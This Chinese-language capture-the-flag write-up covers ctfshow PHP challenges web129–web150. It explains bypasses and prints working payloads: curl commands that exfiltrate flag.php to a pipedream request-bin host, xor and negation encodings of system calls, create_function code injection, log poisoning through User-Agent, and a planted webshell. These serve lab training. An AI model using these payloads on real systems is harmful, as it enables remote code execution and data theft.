web129代码知识点做题子目录函数/方法striposreadfileweb130代码做题web131知识点代码做题Payload参考资料web132代码做题web133知识点代码做题参考资料web134知识点做题web135代码知识点做题非预期解 1非预期解 2预期解web136知识点代码做题web137知识点代码做题参考资料web138代码知识点做题web139知识点做题参考资料web140代码知识点做题参考资料web141代码知识点做题取反异或参考资料web142代码做题web143代码做题web144代码做题web145代码知识点做题web146代码做题web147代码做题参考资料web148代码非预期解预期解web149代码做题web150代码做题web150_plus(未完成)代码做题参考资料
web129
PHP Version: 7.3.11
代码
知识点
- 包含特定字符绕过
做题
readfile() 可以传入一个伪协议,也可以通过子目录父目录的方式绕过
子目录
首先要确定所含判断条件中有名为过滤条件的目录,比如此处过滤条件为 ctfshow,我们就可以看一下有没有名为 ctfshow 的目录,有的话就可以通过
./ctfshow/../
来回到本目录,并在后面加上 flag.php 来读取目录。函数/方法
stripos
作用:查找字符串首次出现的位置(不区分大小写)
如:
readfile
作用:readfile — 输出文件,读取文件并写入到输出缓冲。
web130
PHP Version: 5.6.40
代码
做题
最初一看,以为第二个判断条件
stripos($f, 'ctfshow') === FALSE
是要求 ctfshow 不能放在开头,同时第一个又要求 ctfshow 前面不能出现东西,结果看错了,注意这里第二个判断条件使用的是强类型匹配,匹配的 false,意思是 ctfshow 必须出现,那么只需要 post 的数据 f 为 ctfshow 即可。web131
PHP Version: 5.6.40
知识点
- PHP 正则表达式最大回溯/递归表示
代码
做题
我一开始的思路是,正则匹配式为
/.+?ctfshow/is
,s为single line,那么换行能不能绕过呢?试了一下并不行,然后查了一下writeupPHP中,为了防止一次正则匹配调用的匹配过程过大从而造成过多的资源消耗,限定了一次正则匹配中调用匹配函数的次数。 回溯主要有两种 贪婪模式下,pattern部分被匹配,但是后半部分没匹配(匹配“用力过猛”,把后面的部分也匹配过了)时匹配式回退的操作,在出现*、+时容易产生。 非贪婪模式下,字符串部分被匹配,但后半部分没匹配完全(匹配“用力不够”,需要通配符再匹配一定的长度),在出现*?、+?时容易产生。 ———————————————— 版权声明:本文为CSDN博主「z.volcano」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。 原文链接:https://blog.csdn.net/weixin_45696568/article/details/113631173
为了防止资源耗尽,当要匹配的字符串长度大于 1000014 时,就不会得出正确结果,所以我们要做的就是让前面的东西足够大,以至于无法匹配到后面。但要注意,post的时候字符串也不要太大,避免出现太大请求失败的情况。
编程语言都有类似的字符串重复的语句,比如 PHP 可以使用
str_repeat("kleeisthebest", 233);
,Python 可以使用 "kleeisthebest"*233
Payload
参考资料
web132
PHP Version:5.6.40
代码
做题
原本以为这是一题黑盒题,结果原来只是套到了 /admin/ 下,好家伙做了这么久 PHP 特性来一个黑盒竟然都不会做了,是先看 hint。。。
先访问 /robots.txt ,发现有一条 Disallow: /admin ,遂访问之。
注意这里面判断语句,
if($code === mt_rand(1,0x36D) && $password === $flag
||
$username ==="admin")
中间这里用的是 || ,而 && 的优先级是比 || 高的,所以前面两个判断有一个为false就会判断后面的 $username == "admin" ,只需要在参数中传入即可,而第二个判断条件
if($code == 'admin')
也是一样,最后传入参数为 ?username=admin&password=1&code=admin
即可获得flag。web133
PHP Version: 7.3.11
知识点
- PHP 执行运算符运行 Shell
- 分隔符中插入变量
代码
做题
根据wp,如果传递的参数包括 `$F` 本身,那么就会发生变量覆盖,于是我的疑问如下。
- ` 这个符号在PHP中代表了什么?为什么
$F
可以绕过截断?它的作用是否和 eval 类似?
答:`shell code here` 在PHP中的作用和 shell_exec() 一样,要求 shell_exec() 启用的时候才会有效
- 可以绕过截断的情况下,为什么`$F` 不会造成循环调用自身?
答:因为在 shell 环境下,实际上 $F 是没有被赋值的,我们利用下面这个简单的两行代码来看看效果
![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F1e0f8903-3180-4b01-bed9-6885fc2cf351%2FUntitled.png?table=block&id=39f74a26-2a21-44a1-b4b5-d02f3cbdc237&t=39f74a26-2a21-44a1-b4b5-d02f3cbdc237&width=2590&cache=v2)
可以看到,$F 是没有值的, 同时我们可以跑一些自带的命令如 ping 来看一下它的作用。
![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fcc1287b7-6e91-4c31-bb1d-a3bd664f5298%2FUntitled.png?table=block&id=37684b69-f2f4-4140-91a4-c84798c3b127&t=37684b69-f2f4-4140-91a4-c84798c3b127&width=2148&cache=v2)
接下来的要求就是把 flag.php 带出来了,看起来这里的内容并不会被直接输出。
我们可以使用类似 https://requestbin.com/ 这样的网站来生成一个 bin,然后使用 curl -XPOST -T flag.php https://xxxxxxx.x.pipedream.net/ 来将文件内容带出来,此处 payload 为
?F=$F;+curl%20-XPOST%20-T%20flag.php%20https://xxxxxxxx.x.pipedream.net/
![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fbd0f4969-9b68-4e44-a043-0f5c5eeb96af%2FUntitled.png?table=block&id=92915f00-5c8b-40a5-bb83-8d6b67365bae&t=92915f00-5c8b-40a5-bb83-8d6b67365bae&width=3814&cache=v2)
于是我们可以在这里拿到flag
参考资料
web134
知识点
- 利用 parse_str 覆盖数组
- 利用 extract 将数组解析为变量
做题
原本我的思路是按照 web126 中
/?key=233+key1=36d
来进行覆盖的,但经过尝试以后,发现这题和 web126 是不一样的,web126 使用的是 $a=$_SERVER['argv'];
,我们这里使用的是 parse_str($_SERVER['QUERY_STRING']);
这里解析后只会产生这样的数据![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F0a5a6287-35f2-4ddf-95ce-ac7185c747a6%2FUntitled.png?table=block&id=14102245-a62d-4be4-8d83-5b31e05bbe60&t=14102245-a62d-4be4-8d83-5b31e05bbe60&width=726&cache=v2)
所以,根据提示,我们应该用 $_GET 来覆盖 $_POST ,确实是比较牛逼,我们可以使用
?_POST[key1]=36d&_POST[key2]=36d
来达到 $_GET 覆盖 $_POST 的效果,下面我用一个 gif 来演示一下变量的变化过程。![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fb46d15e1-da1c-44bc-924c-c7ea78dff6a8%2FGETToPost.gif?table=block&id=c6c9f95c-268f-4c71-ae6d-bc5dcb3540a7&t=c6c9f95c-268f-4c71-ae6d-bc5dcb3540a7&width=720&cache=v2)
web135
代码
知识点
- 使用通配符绕过正则表达式
- 该题文件可写,直接复制一个就行了。。
- 使用ping与dnslog逐行将内容带出(反正我没搞出来(
做题
非预期解 1
将 web133 的 curl 改为 /usr/bin/cur* 即可
?F=$F;+/usr/bin/cur*%20-XPOST%20-T%20flag.php%20https://xxxxxxxx.x.pipedream.net/
非预期解 2
这时候你又不限制文件写入了。。。将 flag.php 复制为 flag.txt 即可
payload:
?F=$F;%20cp%20flag.php%20flag.txt
预期解
你这 hint 有问题啊,cat都被屏蔽了,跟着hint就做不出来
web136
PHP Version: 7.3.11
知识点
- exec 执行 linux 指令
- tee 将标准输出输出至文件
代码
做题
注意,这里使用的是 exec() 而非 eval() ,也就意味着他是直接执行 linux 指令的。如果没有拦截
nc;netcat
,我们可以使用反弹shell的方式来获取flag。但是,他这里并没有使用 echo 或者 print 之类的语句将执行结果打印出来,也就意味着我们只能使用输出至文件的方式。
输出至文件,这里
>
被拦截了,但我们可以使用 tee 来将其输出至文件,有关tee的作用可以参照下面的参考资料所以我们可以使用
ls / | tee a
来将 ls /
执行后的结果保存到 a,执行后的结果可访问 url/a 访问,此处为我们可以看到有一个
f149_15_h3r3
挺扎眼的,使用 cat /f149_15_h3r3 | tee b
看看,确实是flagweb137
PHP Version: 7.3.11
知识点
- class 静态方法的调用
- call_user_func 使用
class::method
调用类方法
代码
做题
如此题描述所述,该题确实非常简单。
你只需要了解怎么使用 call_user_func 调用类静态方法即可。
方法一:直接 POST
ctfshow=ctfshow::getFlag
(适用于 web137)方法二:设置
ctfshow[0]=ctfshow, ctfshow[1]=getFlag
(适用于web137 / web138)参考资料
web138
PHP Version: 7.3.11
代码
知识点
- class 静态方法的调用
- call_user_func 使用
class::method
调用类方法
做题
使用 web137 中的方法二即可
方法二:设置
ctfshow[0]=ctfshow, ctfshow[1]=getFlag
(适用于web137 / web138)web139
知识点
- 利用时间盲注来猜测文件名&字符串
- linux 截取字符串的方法
- Python 的 for 循环语句
- ASCII 码表
做题
根据参考资料 1,我们可以通过 cut -c N 来裁切管道传来的字符。在实际操作的时候,我发现 cut 会对每一行都进行切割,导致返回的是一个数组,如下图所示。
![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F59d8368c-ffac-4e05-a15b-c03f0f1263dd%2FUntitled.png?table=block&id=e990a942-99c7-401e-9686-20d18f4435a7&t=e990a942-99c7-401e-9686-20d18f4435a7&width=1472&cache=v2)
我们可以使用
awk 'NR==n'
或者 cat test|sed -n '4p'
来继续对输出进行以行为单位的切割。根据该题描述,我们可以简单地写一个python小程序用于根据时间盲注返回结果
![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F9d4a08d1-5103-46ab-a4ab-1a241bca0b56%2F6C34AE388721618888EC4F3B7B840FD2.jpg?table=block&id=ea90d0bd-5e51-4ee7-a685-dd9ddf3f7925&t=ea90d0bd-5e51-4ee7-a685-dd9ddf3f7925&width=4064&cache=v2)
一轮扫描下来,我们可以发现扫描结果
ls /
有一个结果为 f149_15_h3r3 ,这个应该就是flag,我们再将上面的 ls / 改为 cat /f149_15_h3r3
![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F01f363a6-961b-41f0-9c64-a2ac57b31883%2FUntitled.png?table=block&id=7a7b3346-40fd-4782-8991-12d7da6b7ab1&t=7a7b3346-40fd-4782-8991-12d7da6b7ab1&width=1804&cache=v2)
由于此处 { 和 } 被过滤了,上交flag的时候注意自己补充上就行了
参考资料
web140
PHP Verion: 7.3.11
代码
知识点
- 松散比较
- 对于函数的intval
做题
上回书说到,对于 PHP 数字的判断 ,弱类型是不严格的,比如说
36 == '36ddddddd'
这个返回的是 true,也就是说,对于这题,我们只需要找到一个能使 intval($code) == 0
的即可。所以这题就变得简单了,f1 随便给个类似 md5 啊,sleep 啊之类的都可以,你喜欢的话甚至可以 Intval 套娃。参考资料
web141
PHP Version: 7.3.11
代码
知识点
- 无字母数字绕过正则表达(取反/异或)
- PHP 7 解析方式特性 (function/variable)(param)
做题
由题,v1和v2都得是数字没跑了,重点应该在v3上。但是v3不能使用数字,我们可以使用无字母数字绕过正则表达式的方式,此处我们使用异或的方式,同时使用 PHP 7 的特性,即 (function)(param) 的方式来传入。
![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F471fe264-6381-4782-b255-264cdf86d36e%2FIMG_7731.jpeg?table=block&id=a51cfd88-f8c1-4c23-b8c4-dc398eed7397&t=a51cfd88-f8c1-4c23-b8c4-dc398eed7397&width=2222&cache=v2)
为此,我们可以用下面的程序来计算传入的异或或者取反表达式
取反
(因为 http_build_query 会将 ~ 和 ( 也urlencode掉,好像就没法用了,所以这里还是自己拼接算了
![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F37513ea4-2091-4a4d-950b-c6b4cc78e53b%2FUntitled.png?table=block&id=75591fe8-3a92-44d3-bb4d-236ab96f45c2&t=75591fe8-3a92-44d3-bb4d-236ab96f45c2&width=1896&cache=v2)
访问一下,填入function和param,payload 出来的结果直接丢入即可获得flag。
异或
注释应该还挺详细的,将就着看
此处注意,异或的字符串要加双引号来进行计算,比如
("%08%02%08%08%05%0D"^"%7B%7B%7B%7C%60%60")("%03%01%08%00%06%0C%01%07%00"^"%60%60%7C%20%60%60%60%60%2A")
,切莫忘记双引号,不然就无法进行异或计算了。因为小数点计算可能有问题,我们可以使用通配符来进行传入,最终命令为 system("cat flag*")
![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fcd75c805-8cd3-4088-aecf-0e151f38b315%2FUntitled.png?table=block&id=836d0642-a0b0-42b9-899e-74aaa8731e40&t=836d0642-a0b0-42b9-899e-74aaa8731e40&width=4064&cache=v2)
同时,在PHP里面,数字是可以和函数进行加减运算的,所以我们传入 v1=1, v2=1, v3=-payload-,最终payload为
参考资料
web142
代码
做题
确实难度0 =。=
传入一个 v1 ≤ 0 的数即可,或者 v1 > int_max 的也行
web143
代码
做题
参考 web141 的异或部分,将 web141 的py脚本中pattern改为
[a-z]|[A-Z]|[0-9]|\+|\-|\.|\_|\||\$|\{|\}|\~|\%|\&|\;
即可,并且将 v3 改为 *payload*
(因为-被过滤了,还可以用*来代替运算)web144
PHP Version: 7.3.11
代码
做题
有了前两次的基础,这题就不困难了。使用 web 141 中两种方法任意一种都可以,将 v1 设为 1,将 v3 设为 -,v2 设为执行函数即可。这里用取反作为例子
payload:
v1=1&v3=-&v2=(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%99%93%9E%D5)
web145
PHP Version: 7.3.11
代码
知识点
- 运算符与函数的配合
做题
我超,没想到加减乘除用完还能用二元表达式,是在下输了
将 v3 改为前面 ? 后面 : 组合成二元表达式,最后组合为
1?payload:1
会执行到第一个命令。web146
- 运算符与函数的配合
代码
做题
PHP算是给大佬玩明白了🧎♀️
将 ?: 改成 | (或) 即可
web147
PHP Version: 7.3.11
代码
做题
- 为什么 \ 可以绕过正则表达式?
![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fc07d196f-d694-4442-9932-20f25030cb14%2FUntitled.png?table=block&id=f95567ff-3049-46bf-b7ff-631bd3689ed6&t=f95567ff-3049-46bf-b7ff-631bd3689ed6&width=2238&cache=v2)
答:这里可以看到官方对于全局空间的概念。
如果没有定义任何命名空间,所有的类与函数的定义都是在全局空间,与 PHP 引入命名空间概念前一样。在名称前加上前缀 \ 表示该名称是全局空间中的名称,即使该名称位于其它的命名空间中时也是如此。(参考资料3)
php里默认命名空间是\,所有原生函数和类都在这个命名空间中。普通调用一个函数,如果直接写函数名function_name()调用,调用的时候其实相当于写了一个相对路径;而如果写\function_name() 这样调用函数,则其实是写了一个绝对路径。 如果你在其他namespace里调用系统类,就必须写绝对路径这种写法。 接下来第二个参数可以引发危险的函数。(参考资料1)
刚好该题中正则表达式又限制了不允许只出现数字和下划线,用一个 \ 即可成功绕过正则表达式。
根据官方(参考资料2)的说明,第一个参数是用来传入参数的,第二个则是function中的内容。关于create_function如何实现RCE,为什么闭合后可后面追加代码实现任意代码执行,可参考参考资料4。
简单来说,
create_function($a, $b)
等价于 eval('function __lambda_func(' . $a . '){' . $b '}\0')
(该段代码参考自参考资料4),$a 传入参数已经为空,我们只需要在 $b 上动手脚即可。同时,因为我们没法直接调用 create_function 后的函数,我们才需要手动闭合右括号并加入自己的代码,最后用 //
或 /*
来将后面的 }\0
注释掉,至于create_function你想让他返回什么,那是随便。所以,我们使 Post Param 中的
ctf=\create_function
, 并使 Get Param 中 show=return 1;} system("cat flag.php"); //
即可获得flag。payload:
参考资料
web148
PHP Version: 7.3.11
代码
非预期解
这里也可以用刚才的异或来做,因为这里没有屏蔽 (^),用web141的脚本后面加上分号即可
预期解
使用非英文数字变量,比如中文变量,官方解如下
$哈 == _GET, 所以 ${$哈} == $_GET,${$哈}[哼] == $_GET[哼] == system, ${$哈}[嗯] == $_GET[嗯] == tac f*, 就等于执行 system(tac f*)
web149
PHP Version: 7.3.11
代码
做题
你扫任你扫,我可没说要写在别的地方,我直接写你脸上(指 index.php
ctf=index.php , show=一句话木马 结束战斗,直接antsword拿flag。
web150
PHP Version: 5.6.40
代码
做题
我做这道题的内心戏是这样的。。
![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F64510a5c-1672-470d-b71b-ad402c72544e%2FUntitled.png?table=block&id=1a1d1b98-a4fb-4313-baea-173c3fd29d2c&t=1a1d1b98-a4fb-4313-baea-173c3fd29d2c&width=912&cache=v2)
然后实在没头绪,看了一下wp原来是靠文件包含做的。。。
可以将 ctf 设置为
/var/log/nginx/access.log
,然后将 isVIP 通过 extract($_GET)
设置为 true,并且将 header 中的 User-Agent 改为 <?php echo $flag; ?>
即可获得flag。web150_plus(未完成)
PHP Version: 5.6.40
代码
做题
这里已经拦截了使用日志的方法来引入了,我们可以使用 session.upload-progress 来引入。